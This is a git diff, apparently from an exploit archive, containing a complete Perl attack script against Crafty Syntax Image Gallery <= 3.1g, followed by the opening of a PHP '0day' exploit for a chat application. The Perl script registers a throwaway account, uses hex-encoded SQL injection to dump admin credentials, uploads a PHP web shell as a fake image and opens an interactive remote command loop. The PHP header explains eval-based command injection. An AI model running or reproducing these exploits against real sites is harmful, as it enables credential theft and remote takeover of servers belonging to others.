- my $index1 = index($data, "photo_captions[1] = \" ") + 22;
- my $index2 = index($data, "\"", $index1);
- my $uid = substr($data, $index1, $index2-$index1);
- print "[+] admin uid: '$uid'\n";
-
-
-
-
-
- $shellcode = "and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where recno=".$uid." --";
- $query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." 
HTTP/1.1\r\n";
- $query .= "Host: $server\r\n";
- $query .= "User-Agent: Mozilla/5.0\r\n";
- $query .= "Connection: close\r\n";
- $query .= $cookies;
- $query .= "\r\n";
- my $data = sendpacket($server, $port, $query);
- if($data !~ /photo_captions\[1\] = "/ || $data !~ /photo_urls\[1\] = "/)
- {
- print "[-] exploit failed (mysql < 4 ?)\n";
- exit;
- }
- $index1 = index($data, "photo_captions[1] = \" ") + 22;
- $index2 = index($data, "\"", $index1);
- my $passwd = substr($data, $index1, $index2-$index1);
-
- $index1 = index($data, "photo_urls[1] = \"") + 17;
- $index2 = index($data, "\"", $index1);
- $data = substr($data, $index1, $index2-$index1);
- $index1 = rindex($data, "/") + 1;
- my $username = substr($data, $index1);
-
-
- print "[+] admin username: '$username'\n";
- print "[+] admin password: '$passwd'\n";
-
- my @ret;
- push(@ret, $username);
- push(@ret, $passwd);
- return @ret;
-}
-
-
-sub do_shell(\$,\$,\$,\$,\$) {
- my $server = shift;
- my $port = shift;
- my $path = shift;
- my $location = shift;
- my $command = shift;
-
- my $d = "c=".$command;
- my $query = "POST ".$path.$location." HTTP/1.1\r\n";
- $query .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $query .= "Host: $server\r\n";
- $query .= "User-Agent: Mozilla/5.0\r\n";
- $query .= "Connection: close\r\n";
- $query .= "Content-Length: ".length($d)."\r\n";
- $query .= "\r\n";
- $query .= $d;
-
- my $data = sendpacket($server, $port, $query);
- my $index = index($data, "\r\n\r\n");
- if($index >= 0)
- {
- print substr($data, $index+4)."\n";
- }
- else
- {
- print "[-] shell error?\n";
- }
-}
-
-sub check_shell(\$,\$,\$,\$) {
- my $server = shift;
- my $port = shift;
- my $path = shift;
- my $location = shift;
-
-
- my $query = "GET ".$path.$location." 
HTTP/1.1\r\n";
- $query .= "Host: $server\r\n";
- $query .= "User-Agent: Mozilla/5.0\r\n";
- $query .= "Connection: close\r\n";
- $query .= "\r\n";
- my $data = sendpacket($server, $port, $query);
-
- if($data !~ /HTTP\/1.1 200 OK/)
- {
- print "[-] shell not found\n";
- print "[-] try ".$server.$path."/userimages/\n";
- exit;
- }
-}
-
-sub get_shell_location(\$,\$,\$,\$) {
- print "[+] getting shell location\n";
- my $server = shift;
- my $port = shift;
- my $path = shift;
- my $cookies = shift;
- my $shellcode;
-
- $shellcode = "\x61\x6e\x64\x20\x69\x6d\x61\x67\x65\x20\x4c\x49\x4b\x45\x20\x43";
- $shellcode .= "\x4f\x4e\x43\x41\x54\x28\x30\x78\x32\x35\x32\x65\x37\x30\x36\x38";
- $shellcode .= "\x37\x30\x29\x20\x6f\x72\x64\x65\x72\x20\x62\x79\x20\x72\x65\x63";
- $shellcode .= "\x6e\x6f\x20\x64\x65\x73\x63\x20\x6c\x69\x6d\x69\x74\x20\x31\x20";
- $shellcode .= "\x2d\x2d";
-
-
- my $query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\r\n";
- $query .= "Host: $server\r\n";
- $query .= "User-Agent: Mozilla/5.0\r\n";
- $query .= "Connection: close\r\n";
- $query .= $cookies;
- $query .= "\r\n";
- my $data = sendpacket($server, $port, $query);
- if($data =~ /There are no photos in this gallery/)
- {
- print "[-] shell not found\n";
- print "[-] try ".$server.$path."/userimages/\n";
- exit;
- }
-
- my $index1 = index($data, "photo_urls[1] = \"") + 17;
- my $index2 = index($data, "\"", $index1);
- my $location = substr($data, $index1, $index2-$index1);
- print "[+] shell @ '".$location."'\n";
- return $location;
-}
-
-sub get_projectid(\$,\$,\$,\$) {
- my $server = shift;
- my $port = shift;
- my $path = shift;
- my $cookies = shift;
-
- my $query = "GET ".$path."imagemenu.php?html=menu.tpl HTTP/1.1\r\n";
- $query .= "Host: $server\r\n";
- $query .= "User-Agent: Mozilla/5.0\r\n";
- $query .= "Connection: close\r\n";
- $query .= $cookies;
- $query .= "\r\n";
- my $data = sendpacket($server, $port, $query);
- my $projectid;
- if($data =~ 
/\?projectid=([0-9]*)/)
- {
- $projectid = $1;
- }
- else
- {
- print "[-] no projectid found";
- exit;
- }
-
- print "[+] projectid is '$projectid'\n";
- return $projectid;
-}
-
-sub upload_shell(\$,\$,\$,\$,\$) {
- my $server = shift;
- my $port = shift;
- my $path = shift;
- my $cookies = shift;
- my $projectid = shift;
-
- my $query = "GET ".$path."newimage.php?projectid=".$projectid." HTTP/1.1\r\n";
- $query .= "Host: $server\r\n";
- $query .= "User-Agent: Mozilla/5.0\r\n";
- $query .= "Connection: close\r\n";
- $query .= $cookies;
- $query .= "\r\n";
- my $data = sendpacket($server, $port, $query);
- if($data =~ /Access denied.../)
- {
- print "[-] no admin privileges (mysql < 4.0 ?)\n";
- exit;
- }
-
- my $shell = "";
-
- my $boundary = "-----------------------------220162907215434";
- my $post = "--".$boundary."\r\n";
- $post .= "Content-Disposition: form-data; name=\"projectid\"\r\n\r\n";
- $post .= $projectid."\r\n";
-
- $post .= "--".$boundary."\r\n";
- $post .= "Content-Disposition: form-data; name=\"A_MONTH\"\r\n\r\n";
- $post .= "03\r\n";
-
- $post .= "--".$boundary."\r\n";
- $post .= "Content-Disposition: form-data; name=\"A_DAY\"\r\n\r\n";
- $post .= "26\r\n";
-
- $post .= "--".$boundary."\r\n";
- $post .= "Content-Disposition: form-data; name=\"A_YEAR\"\r\n\r\n";
- $post .= "2006\r\n";
-
- $post .= "--".$boundary."\r\n";
- $post .= "Content-Disposition: form-data; name=\"fullimage\"; filename=\"my_image.jpg\"\r\n";
- $post .= "Content-Type: text/plain\r\n\r\n";
- $post .= $shell."\r\n";
-
- $post .= "--".$boundary."\r\n";
- $post .= "Content-Disposition: form-data; name=\"description\"\r\n\r\n";
- $post .= "another image\r\n";
-
- $post .= "--".$boundary."\r\n";
- $post .= "Content-Disposition: form-data; name=\"ext\"\r\n\r\n";
- $post .= ".php\r\n";
-
- $post .= "--".$boundary."\r\n";
- $post .= "Content-Disposition: form-data; name=\"feature__".$projectid."\"\r\n\r\n";
- $post .= "Y\r\n";
-
- $post .= "--".$boundary."\r\n";
- $post .= 
"Content-Disposition: form-data; name=\"addnow\"\r\n\r\n";
- $post .= "ADD\r\n";
-
- $post .= "--".$boundary."--\r\n";
-
- my $query = "POST ".$path."newimage.php?projectid=".$projectid." HTTP/1.1\r\n";
- $query .= "Content-Type: multipart/form-data; boundary=".$boundary."\r\n";
- $query .= "Host: $server\r\n";
- $query .= "User-Agent: Mozilla/5.0\r\n";
- $query .= "Connection: close\r\n";
- $query .= $cookies;
- $query .= "Content-Length: ".length($post)."\r\n";
- $query .= "\r\n";
- $query .= $post;
-
- sendpacket($server, $port, $query);
-}
-
-sub login(\$,\$,\$,\$,\$) {
- my $server = shift;
- my $port = shift;
- my $path = shift;
- my $username = shift;
- my $password = shift;
-
- my $d = "whattodo=login&myusername=".$username."&mypassword=".$password;
- my $query = "POST ".$path."index.php HTTP/1.1\r\n";
- $query .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $query .= "Host: $server\r\n";
- $query .= "User-Agent: Mozilla/5.0\r\n";
- $query .= "Connection: close\r\n";
- $query .= "Content-Length: ".length($d)."\r\n";
- $query .= "\r\n";
- $query .= $d;
-
- my $data = sendpacket($server, $port, $query);
- if($data =~ /Your Name:<\/td>= 0)
- {
- my $index2 = index($data, "Set-Cookie: ") + 12;
- my $index3 = index($data, "\r\n", $index2);
- $cookies = "Cookie: ".substr($data, $index2, $index3-$index2+2);
- }
-
- print "[+] logged in as '$username'\n";
- return $cookies;
-}
-
-sub register(\$, \$, \$, \$, \$, \$, \$) {
- my $server = shift;
- my $path = shift;
- my $name = shift;
- my $user = shift;
- my $password = shift;
- my $email = shift;
-
- my $d = "action=register&emailadd=".$email."&newname=".$name."&newusername=".$user."&newpassword=".$password;
- my $query = "POST ".$path."lostsheep.php HTTP/1.1\r\n";
- $query .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $query .= "Host: $server\r\n";
- $query .= "User-Agent: Mozilla/5.0\r\n";
- $query .= "Connection: close\r\n";
- $query .= "Content-Length: ".length($d)."\r\n";
- $query .= 
"\r\n";
- $query .= $d;
-
- my $data = sendpacket($server, $port, $query);
- if($data =~ /
  • Sorry the username you entered <\/b> is already taken.. try again/)
- {
- print "[-] failed: username taken\n";
- exit;
- }
- if($data =~ /you did not enter in a/)
- {
- print "[-] failed\n";
- exit;
- }
- print "[+] user '$user' with password '$password' registered\n";
-}
-
-sub sendpacket(\$,\$,\$) {
- my $server = shift;
- my $port = shift;
- my $request = shift;
-
- my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => $port) or die "[-] Could not connect to $server:$port $!\n";
- print $sock "$request";
-
-
- my $data = "";
- my $answer;
- while($answer = <$sock>)
- {
- $data .= $answer;
- }
-
- close($sock);
- return $data;
-}
-
-sub randstring(\$,\$) {
- my $min = shift;
- my $max = shift;
-
- my $length = int( (rand(65535)%($max-$min+1))+$min);
- my $ret = "";
- for(my $i = 0; $i < $length; $i++)
- {
- my $w = int(rand(3));
- if($w == 0)
- {
- $ret .= chr(97 + int(rand(26)));
- }
- elsif($w == 1)
- {
- $ret .= chr(65 + int(rand(26)));
- }
- else
- {
- $ret .= chr(48 + int(rand(10)));
- }
- }
-
- return $ret;
-}
-
-
-sub usage() {
- printf "usage: %s [user(optional)] [password(optional)] [shell path without trailing / (optional)]\n", $0;
- printf "exemple: %s www.site.com/csig/ 80\n", $0;
- exit;
-}
-
-
-sub urlEncode {
- my ($string) = @_;
- $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
- return $string;
-}
-
-# milw0rm.com [2006-04-04]
+#!/usr/bin/perl
+###############################################################################
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License
+# as published by the Free Software Foundation; either version 2
+# of the License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
+###############################################################################
+
+# =====================================================
+# $ crappy_syntax.pl localhost/csig/ 80
+#
+# :: crafty syntax image gallery <= 3.1g
+# :: by undefined1_ @ bash-x.net/undef/
+# :: note: this works only on mysql >= 4.0
+#
+#
+# [+] creating user account
+# [+] user: 98fe56123
+# password: 7652L4M3l39q
+# email: SehswdSx0E@hotmail.com
+# [+] user '98fe56123' with password '7652L4M3l39q' registered
+# [+] logged in as 98fe56123
+# [+] projectid is 2
+# [-] no admin found for this projectid, trying the username 'admin'
+# [+] admin username: 'admin'
+# [+] admin password: '1111'
+# [+] logged in as 'admin'
+# [+] getting shell location
+# [+] shell @ 'userimages/1/18d76bcbc6f2.php'
+# [+] have phun?
+#
+# localhost$ uname
+# Linux
+# localhost$ whoami
+# nobody
+# =====================================================
+
+use strict;
+use IO::Socket;
+
+$| = 1;
+print ":: crafty syntax image gallery <= 3.1g\n";
+print ":: by undefined1_ @ bash-x.net/undef/\n";
+print ":: note: this works only on mysql >= 4.0\n\n\n";
+
+my $website = shift || usage();
+my $port = shift || usage();
+my $user = shift;
+my $password = shift;
+my $location = shift;
+
+
+
+my $path = "/";
+my $server = $website;
+if(index($website, "/") != -1)
+{
+ $path = substr($website, index($website, "/"));
+ $server = substr($website, 0, index($website, "/"));
+ if(substr($path, length($path)-1) ne "/")
+ {
+ $path .= "/";
+ }
+}
+if($location eq "")
+{
+ if($user eq "" && $password eq "")
+ {
+ print "[+] creating user account\n";
+ $user = randstring(8,12);
+ $password = randstring(8,12);
+ my $email = randstring(8,12)."\@hotmail.com";
+ printf("[+]\tuser: %s\n", $user);
+ printf("\tpassword: %s\n", $password);
+ printf("\temail: %s\n", $email);
+ register($server, $path, $user, $user, $password, $email);
+ }
+
+ my $cookies = login($server, $port, $path, $user, $password);
+ my $projectid = get_projectid($server, $port, $path, $cookies);
+ my @admin = send_payload($server, $port, $path, $cookies, $projectid);
+
+ $cookies = login($server, $port, $path, $admin[0], $admin[1]);
+ upload_shell($server, $port, $path, $cookies, $projectid);
+ $location = get_shell_location($server,$port,$path,$cookies);
+}
+
+check_shell($server, $port, $path, $location);
+printf("[+] have phun?\n\n");
+my $command;
+while(1)
+{
+ print $server."\$ ";
+ while()
+ {
+ $command = $_;
+ chomp($command);
+ last;
+ }
+ do_shell($server,$port,$path,$location,$command);
+}
+
+
+sub send_payload(\$,\$,\$,\$,\$) {
+ my $server = shift;
+ my $port = shift;
+ my $path = shift;
+ my $cookies = shift;
+ my $projectid = shift;
+ my $shellcode;
+
+ $shellcode = "\x61\x6e\x64\x20\x31\x3d\x30\x20\x75\x6e\x69\x6f\x6e\x20";
+ 
$shellcode .= "\x61\x6c\x6c\x20\x73\x65\x6c\x65\x63\x74\x20\x31\x2c\x32";
+ $shellcode .= "\x2c\x33\x2c\x34\x2c\x35\x2c\x75\x73\x65\x72\x69\x64\x20";
+ $shellcode .= "\x61\x73\x20\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e";
+ $shellcode .= "\x2c\x37\x2c\x38\x2c\x39\x2c\x30\x2c\x31\x2c\x32\x2c\x33";
+ $shellcode .= "\x2c\x34\x2c\x35\x2c\x35\x20\x66\x72\x6f\x6d\x20\x67\x61";
+ $shellcode .= "\x6c\x6c\x65\x72\x79\x5f\x61\x63\x63\x65\x73\x73\x20\x77";
+ $shellcode .= "\x68\x65\x72\x65\x20\x67\x61\x6c\x6c\x65\x72\x79\x69\x64";
+ $shellcode .= "\x3d";
+ $shellcode .= $projectid;
+ $shellcode .= "\x20\x61\x6e\x64\x20\x70\x65\x72\x6d\x69\x73\x73\x69\x6f";
+ $shellcode .= "\x6e\x73\x3d\x43\x4f\x4e\x43\x41\x54\x28\x30\x78\x34\x36";
+ $shellcode .= "\x35\x35\x34\x63\x34\x63\x29\x20\x2d\x2d";
+
+ my $query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\r\n";
+ $query .= "Host: $server\r\n";
+ $query .= "User-Agent: Mozilla/5.0\r\n";
+ $query .= "Connection: close\r\n";
+ $query .= $cookies;
+ $query .= "\r\n";
+ my $data = sendpacket($server, $port, $query);
+ if($data !~ /photo_captions\[1\] = "/)
+ {
+ print "[-] no admin found for this projectid, trying the username 'admin'\n";
+ $shellcode = "and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where username=CONCAT(0x61646d696e) --";
+ $query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." 
HTTP/1.1\r\n";
+ $query .= "Host: $server\r\n";
+ $query .= "User-Agent: Mozilla/5.0\r\n";
+ $query .= "Connection: close\r\n";
+ $query .= $cookies;
+ $query .= "\r\n";
+ my $data = sendpacket($server, $port, $query);
+ if($data !~ /photo_captions\[1\] = "/ || $data !~ /photo_urls\[1\] = "/)
+ {
+ print "[-] exploit failed\n";
+ exit;
+ }
+ my $index1 = index($data, "photo_captions[1] = \" ") + 22;
+ my $index2 = index($data, "\"", $index1);
+ my $passwd = substr($data, $index1, $index2-$index1);
+
+ $index1 = index($data, "photo_urls[1] = \"") + 17;
+ $index2 = index($data, "\"", $index1);
+ $data = substr($data, $index1, $index2-$index1);
+ $index1 = rindex($data, "/") + 1;
+ my $username = substr($data, $index1);
+
+
+ print "[+] admin username: '$username'\n";
+ print "[+] admin password: '$passwd'\n";
+
+ my @ret;
+ push(@ret, $username);
+ push(@ret, $passwd);
+ return @ret;
+ }
+ my $index1 = index($data, "photo_captions[1] = \" ") + 22;
+ my $index2 = index($data, "\"", $index1);
+ my $uid = substr($data, $index1, $index2-$index1);
+ print "[+] admin uid: '$uid'\n";
+
+
+
+
+
+ $shellcode = "and 1=0 union all select 1,username as image,3,4,5,password AS description,7,8,9,10,11,12,13,14,15,16 from gallery_users where recno=".$uid." --";
+ $query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." 
HTTP/1.1\r\n";
+ $query .= "Host: $server\r\n";
+ $query .= "User-Agent: Mozilla/5.0\r\n";
+ $query .= "Connection: close\r\n";
+ $query .= $cookies;
+ $query .= "\r\n";
+ my $data = sendpacket($server, $port, $query);
+ if($data !~ /photo_captions\[1\] = "/ || $data !~ /photo_urls\[1\] = "/)
+ {
+ print "[-] exploit failed (mysql < 4 ?)\n";
+ exit;
+ }
+ $index1 = index($data, "photo_captions[1] = \" ") + 22;
+ $index2 = index($data, "\"", $index1);
+ my $passwd = substr($data, $index1, $index2-$index1);
+
+ $index1 = index($data, "photo_urls[1] = \"") + 17;
+ $index2 = index($data, "\"", $index1);
+ $data = substr($data, $index1, $index2-$index1);
+ $index1 = rindex($data, "/") + 1;
+ my $username = substr($data, $index1);
+
+
+ print "[+] admin username: '$username'\n";
+ print "[+] admin password: '$passwd'\n";
+
+ my @ret;
+ push(@ret, $username);
+ push(@ret, $passwd);
+ return @ret;
+}
+
+
+sub do_shell(\$,\$,\$,\$,\$) {
+ my $server = shift;
+ my $port = shift;
+ my $path = shift;
+ my $location = shift;
+ my $command = shift;
+
+ my $d = "c=".$command;
+ my $query = "POST ".$path.$location." HTTP/1.1\r\n";
+ $query .= "Content-Type: application/x-www-form-urlencoded\r\n";
+ $query .= "Host: $server\r\n";
+ $query .= "User-Agent: Mozilla/5.0\r\n";
+ $query .= "Connection: close\r\n";
+ $query .= "Content-Length: ".length($d)."\r\n";
+ $query .= "\r\n";
+ $query .= $d;
+
+ my $data = sendpacket($server, $port, $query);
+ my $index = index($data, "\r\n\r\n");
+ if($index >= 0)
+ {
+ print substr($data, $index+4)."\n";
+ }
+ else
+ {
+ print "[-] shell error?\n";
+ }
+}
+
+sub check_shell(\$,\$,\$,\$) {
+ my $server = shift;
+ my $port = shift;
+ my $path = shift;
+ my $location = shift;
+
+
+ my $query = "GET ".$path.$location." 
HTTP/1.1\r\n";
+ $query .= "Host: $server\r\n";
+ $query .= "User-Agent: Mozilla/5.0\r\n";
+ $query .= "Connection: close\r\n";
+ $query .= "\r\n";
+ my $data = sendpacket($server, $port, $query);
+
+ if($data !~ /HTTP\/1.1 200 OK/)
+ {
+ print "[-] shell not found\n";
+ print "[-] try ".$server.$path."/userimages/\n";
+ exit;
+ }
+}
+
+sub get_shell_location(\$,\$,\$,\$) {
+ print "[+] getting shell location\n";
+ my $server = shift;
+ my $port = shift;
+ my $path = shift;
+ my $cookies = shift;
+ my $shellcode;
+
+ $shellcode = "\x61\x6e\x64\x20\x69\x6d\x61\x67\x65\x20\x4c\x49\x4b\x45\x20\x43";
+ $shellcode .= "\x4f\x4e\x43\x41\x54\x28\x30\x78\x32\x35\x32\x65\x37\x30\x36\x38";
+ $shellcode .= "\x37\x30\x29\x20\x6f\x72\x64\x65\x72\x20\x62\x79\x20\x72\x65\x63";
+ $shellcode .= "\x6e\x6f\x20\x64\x65\x73\x63\x20\x6c\x69\x6d\x69\x74\x20\x31\x20";
+ $shellcode .= "\x2d\x2d";
+
+
+ my $query = "GET ".$path."slides.php?limitquery_s=".urlEncode($shellcode)." HTTP/1.1\r\n";
+ $query .= "Host: $server\r\n";
+ $query .= "User-Agent: Mozilla/5.0\r\n";
+ $query .= "Connection: close\r\n";
+ $query .= $cookies;
+ $query .= "\r\n";
+ my $data = sendpacket($server, $port, $query);
+ if($data =~ /There are no photos in this gallery/)
+ {
+ print "[-] shell not found\n";
+ print "[-] try ".$server.$path."/userimages/\n";
+ exit;
+ }
+
+ my $index1 = index($data, "photo_urls[1] = \"") + 17;
+ my $index2 = index($data, "\"", $index1);
+ my $location = substr($data, $index1, $index2-$index1);
+ print "[+] shell @ '".$location."'\n";
+ return $location;
+}
+
+sub get_projectid(\$,\$,\$,\$) {
+ my $server = shift;
+ my $port = shift;
+ my $path = shift;
+ my $cookies = shift;
+
+ my $query = "GET ".$path."imagemenu.php?html=menu.tpl HTTP/1.1\r\n";
+ $query .= "Host: $server\r\n";
+ $query .= "User-Agent: Mozilla/5.0\r\n";
+ $query .= "Connection: close\r\n";
+ $query .= $cookies;
+ $query .= "\r\n";
+ my $data = sendpacket($server, $port, $query);
+ my $projectid;
+ if($data =~ 
/\?projectid=([0-9]*)/)
+ {
+ $projectid = $1;
+ }
+ else
+ {
+ print "[-] no projectid found";
+ exit;
+ }
+
+ print "[+] projectid is '$projectid'\n";
+ return $projectid;
+}
+
+sub upload_shell(\$,\$,\$,\$,\$) {
+ my $server = shift;
+ my $port = shift;
+ my $path = shift;
+ my $cookies = shift;
+ my $projectid = shift;
+
+ my $query = "GET ".$path."newimage.php?projectid=".$projectid." HTTP/1.1\r\n";
+ $query .= "Host: $server\r\n";
+ $query .= "User-Agent: Mozilla/5.0\r\n";
+ $query .= "Connection: close\r\n";
+ $query .= $cookies;
+ $query .= "\r\n";
+ my $data = sendpacket($server, $port, $query);
+ if($data =~ /Access denied.../)
+ {
+ print "[-] no admin privileges (mysql < 4.0 ?)\n";
+ exit;
+ }
+
+ my $shell = "";
+
+ my $boundary = "-----------------------------220162907215434";
+ my $post = "--".$boundary."\r\n";
+ $post .= "Content-Disposition: form-data; name=\"projectid\"\r\n\r\n";
+ $post .= $projectid."\r\n";
+
+ $post .= "--".$boundary."\r\n";
+ $post .= "Content-Disposition: form-data; name=\"A_MONTH\"\r\n\r\n";
+ $post .= "03\r\n";
+
+ $post .= "--".$boundary."\r\n";
+ $post .= "Content-Disposition: form-data; name=\"A_DAY\"\r\n\r\n";
+ $post .= "26\r\n";
+
+ $post .= "--".$boundary."\r\n";
+ $post .= "Content-Disposition: form-data; name=\"A_YEAR\"\r\n\r\n";
+ $post .= "2006\r\n";
+
+ $post .= "--".$boundary."\r\n";
+ $post .= "Content-Disposition: form-data; name=\"fullimage\"; filename=\"my_image.jpg\"\r\n";
+ $post .= "Content-Type: text/plain\r\n\r\n";
+ $post .= $shell."\r\n";
+
+ $post .= "--".$boundary."\r\n";
+ $post .= "Content-Disposition: form-data; name=\"description\"\r\n\r\n";
+ $post .= "another image\r\n";
+
+ $post .= "--".$boundary."\r\n";
+ $post .= "Content-Disposition: form-data; name=\"ext\"\r\n\r\n";
+ $post .= ".php\r\n";
+
+ $post .= "--".$boundary."\r\n";
+ $post .= "Content-Disposition: form-data; name=\"feature__".$projectid."\"\r\n\r\n";
+ $post .= "Y\r\n";
+
+ $post .= "--".$boundary."\r\n";
+ $post .= 
"Content-Disposition: form-data; name=\"addnow\"\r\n\r\n";
+ $post .= "ADD\r\n";
+
+ $post .= "--".$boundary."--\r\n";
+
+ my $query = "POST ".$path."newimage.php?projectid=".$projectid." HTTP/1.1\r\n";
+ $query .= "Content-Type: multipart/form-data; boundary=".$boundary."\r\n";
+ $query .= "Host: $server\r\n";
+ $query .= "User-Agent: Mozilla/5.0\r\n";
+ $query .= "Connection: close\r\n";
+ $query .= $cookies;
+ $query .= "Content-Length: ".length($post)."\r\n";
+ $query .= "\r\n";
+ $query .= $post;
+
+ sendpacket($server, $port, $query);
+}
+
+sub login(\$,\$,\$,\$,\$) {
+ my $server = shift;
+ my $port = shift;
+ my $path = shift;
+ my $username = shift;
+ my $password = shift;
+
+ my $d = "whattodo=login&myusername=".$username."&mypassword=".$password;
+ my $query = "POST ".$path."index.php HTTP/1.1\r\n";
+ $query .= "Content-Type: application/x-www-form-urlencoded\r\n";
+ $query .= "Host: $server\r\n";
+ $query .= "User-Agent: Mozilla/5.0\r\n";
+ $query .= "Connection: close\r\n";
+ $query .= "Content-Length: ".length($d)."\r\n";
+ $query .= "\r\n";
+ $query .= $d;
+
+ my $data = sendpacket($server, $port, $query);
+ if($data =~ /Your Name:<\/td>= 0)
+ {
+ my $index2 = index($data, "Set-Cookie: ") + 12;
+ my $index3 = index($data, "\r\n", $index2);
+ $cookies = "Cookie: ".substr($data, $index2, $index3-$index2+2);
+ }
+
+ print "[+] logged in as '$username'\n";
+ return $cookies;
+}
+
+sub register(\$, \$, \$, \$, \$, \$, \$) {
+ my $server = shift;
+ my $path = shift;
+ my $name = shift;
+ my $user = shift;
+ my $password = shift;
+ my $email = shift;
+
+ my $d = "action=register&emailadd=".$email."&newname=".$name."&newusername=".$user."&newpassword=".$password;
+ my $query = "POST ".$path."lostsheep.php HTTP/1.1\r\n";
+ $query .= "Content-Type: application/x-www-form-urlencoded\r\n";
+ $query .= "Host: $server\r\n";
+ $query .= "User-Agent: Mozilla/5.0\r\n";
+ $query .= "Connection: close\r\n";
+ $query .= "Content-Length: ".length($d)."\r\n";
+ $query .= 
"\r\n";
+ $query .= $d;
+
+ my $data = sendpacket($server, $port, $query);
+ if($data =~ /
  • Sorry the username you entered <\/b> is already taken.. try again/)
+ {
+ print "[-] failed: username taken\n";
+ exit;
+ }
+ if($data =~ /you did not enter in a/)
+ {
+ print "[-] failed\n";
+ exit;
+ }
+ print "[+] user '$user' with password '$password' registered\n";
+}
+
+sub sendpacket(\$,\$,\$) {
+ my $server = shift;
+ my $port = shift;
+ my $request = shift;
+
+ my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => $port) or die "[-] Could not connect to $server:$port $!\n";
+ print $sock "$request";
+
+
+ my $data = "";
+ my $answer;
+ while($answer = <$sock>)
+ {
+ $data .= $answer;
+ }
+
+ close($sock);
+ return $data;
+}
+
+sub randstring(\$,\$) {
+ my $min = shift;
+ my $max = shift;
+
+ my $length = int( (rand(65535)%($max-$min+1))+$min);
+ my $ret = "";
+ for(my $i = 0; $i < $length; $i++)
+ {
+ my $w = int(rand(3));
+ if($w == 0)
+ {
+ $ret .= chr(97 + int(rand(26)));
+ }
+ elsif($w == 1)
+ {
+ $ret .= chr(65 + int(rand(26)));
+ }
+ else
+ {
+ $ret .= chr(48 + int(rand(10)));
+ }
+ }
+
+ return $ret;
+}
+
+
+sub usage() {
+ printf "usage: %s [user(optional)] [password(optional)] [shell path without trailing / (optional)]\n", $0;
+ printf "exemple: %s www.site.com/csig/ 80\n", $0;
+ exit;
+}
+
+
+sub urlEncode {
+ my ($string) = @_;
+ $string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
+ return $string;
+}
+
+# milw0rm.com [2006-04-04]
diff --git a/platforms/php/webapps/1646.php b/platforms/php/webapps/1646.php
index 68b628ee9..186bff7e3 100755
--- a/platforms/php/webapps/1646.php
+++ b/platforms/php/webapps/1646.php
@@ -1,199 +1,199 @@ -#!/usr/bin/php -q -d short_open_tag=on -query("INSERT INTO ".C_MSG_TBL." VALUES ($T, '$R', 'SYS exit', '', ".time().", '', 'sprintf(L_EXIT_ROM, \"".special_char($U,$Latin1,1)."\")')"); -# $kicked = 3; -# } -# ... -# -# have a look to "T" argument, it is not sanitized before to be used in our -# INSERT query, so we can inject all the values we want and store them -# in the c_messages table. Also it is not delimited by quotes & we do not need -# quotes to extend the query, so this works regardless of magic_quotes_gpc settings -# -# sprintf() should be passed to an eval() near line 197: -# -# ... -# // "System" messages -# else -# { -# if ($Dest == " *") -# { -# $Message = "[".L_ANNOUNCE."] ".$Message; -# } -# else -# { -# if ($Dest != "") $NewMsg .= ">[".htmlspecialchars(stripslashes($Dest))."] "; -# $Message = str_replace("$","\\$",$Message); // avoid '$' chars in nick to be parsed bellow -# eval("\$Message = $Message;"); -# }; -# $NewMsg .= "".$Message."

    "; -# }; -# ... -# -# but what happen if we inject a system() call instead and if we simulate -# to be the SYS user? :) -# -# this is 0day, enjoy it - -error_reporting(0); -ini_set("max_execution_time",0); -ini_set("default_socket_timeout",5); - -function quick_dump($string) -{ - $result='';$exa='';$cont=0; - for ($i=0; $i<=strlen($string)-1; $i++) - { - if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) - {$result.=" .";} - else - {$result.=" ".$string[$i];} - if (strlen(dechex(ord($string[$i])))==2) - {$exa.=" ".dechex(ord($string[$i]));} - else - {$exa.=" 0".dechex(ord($string[$i]));} - $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} - } - return $exa."\r\n".$result; -} -$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; -function sendpacketii($packet) -{ - global $proxy, $host, $port, $html, $proxy_regex; - if ($proxy=='') { - $ock=fsockopen(gethostbyname($host),$port); - if (!$ock) { - echo 'No response from '.$host.':'.$port; die; - } - } - else { - $c = preg_match($proxy_regex,$proxy); - if (!$c) { - echo 'Not a valid proxy...';die; - } - $parts=explode(':',$proxy); - echo "Connecting to ".$parts[0].":".$parts[1]." 
